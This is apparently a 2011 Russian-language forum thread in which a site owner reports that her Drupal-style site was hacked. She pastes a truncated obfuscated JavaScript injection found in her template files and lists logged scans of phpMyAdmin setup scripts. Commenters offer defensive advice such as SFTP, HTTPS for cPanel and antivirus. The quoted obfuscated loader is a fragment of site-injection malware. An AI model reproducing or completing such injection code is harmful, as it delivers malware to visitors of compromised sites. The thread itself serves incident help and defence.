29 сентября 2011 в 21:09
28 сентября на сайтах (они на одном аккаунте) обнаружила чужой код — в теге script
test='h'+'arC';for(i in $='b4h3tbn34')if(i=='te'+'st')m=$[i]
;try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'
v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}
d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd
='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+
"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)x=-1*(d-d
2);n=[-x+7,-x+7,-x+103,-x+100 и еще много цифр с -x+
Он был вставлен на всех файлах tpl.php и html
Несколько лет я уже сталкивалась с такой проблемой — в то время я хранила пароль от ftp в Total Commander, который категорически не рекомендуется для этих целей. С тех времен пользуюсь файлзиллой, которая, как говорят, более безопасна. Пересела на линукс (убунту) , который менее интересен хакерам по сравнению с виндусом.
Как происходил взлом (согласно записям в системном журнале) :
сентябрь 26, 2011 - 13:20 — http://www.rudolfnureyev.org/admin/phpmyadmin/scripts/setup.php
сентябрь 26, 2011 - 12:52 — http://www.rudolfnureyev.org/sqlmanager/scripts/setup.php
сентябрь 26, 2011 - 12:12 — http://www.rudolfnureyev.org/admin/phpmyadmin/scripts/setup.php
сентябрь 26, 2011 - 10:49 — http://www.rudolfnureyev.org/phpmyadm/scripts/setup.php
сентябрь 26, 2011 - 12:45 — http://www.rudolfnureyev.org/pma2005/scripts/setup.php
сентябрь 27, 2011 - 15:27 — http://www.rudolfnureyev.org/j81t0i777m.zip
Пароль от аккаунта поменяла. Регистрацию новых пользователей без разрешения админа запретила.
Что делать, если я снова обнаружу подобные сообщения? Менять пароль? В этом все дело?
Комментарии
Гуглить Трубиновскую на этом сайте
При заходе на http://www.rudolfnureyev.org/from_authors/ выдает:
"Внимание! Обнаружена проблема!
www.rudolfnureyev.org содержит материалы сайта c.cc-google-analytics.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта."
Странно, у меня Винда, ТК для ftp и практически ежедневно проскакивают подобные запросы к сайту, но пока ничего не обнаружил.
Плюс комп периодически (раз в недельку) славливает эксплойты и трояны.
Это запросы к установочным скриптам таких служб как phpmyadmin, если хостер их удалил после установки - уязвимости нет.
Если под виндами ходите, антивирус в первую очередь. Сохраненные пароли не очень безопасны. Еще можете словить кейлогер, который снимет ваш ввод прямо в TC, WinSCP или в Filezilla. Тут только антивирус спасет, да и то не всегда.
Попросите хостера сменить простой FTP на секьюрный протокол SFTP, SCP. Правда, придется отказаться от TC.
Загляните на страницу управления хостингом - если хостер применяет для входа в неё HTTP - нахрен с пляжу такого осла, ваш пароль можно поймать в открытом виде на любом хосте через которые идет пакет.
Если панель управления хостингом самописная, стоит тоже подумать о смене хостера.
У меня нет антивира вапче, вернее фаервола - пользую только Gmer и Cureit раз в неделю-две. Сколько ни юзал антивирей, понял, что самый лучший из них - собственная голова.
А пароли не ввожу - они сохранены в браузере.
Romsla, direqtor, Спасибо за инфу!
Спасибо за ответы. Панель управления — cpanel. Захожу по http://rudolfnureyev.org:2082/
Пароль помнит браузер. Т.е. хостер применяет далеко небезопасный вход?
Для анонимуса там об этом даже красными буквами написано. Настройте вход по HTTPS.
Спасибо.
Думаю, дело было так: в корень сайта поместили архив j81t0i777m.zip. Затем его открыли http://www.rudolfnureyev.org/j81t0i777m.zip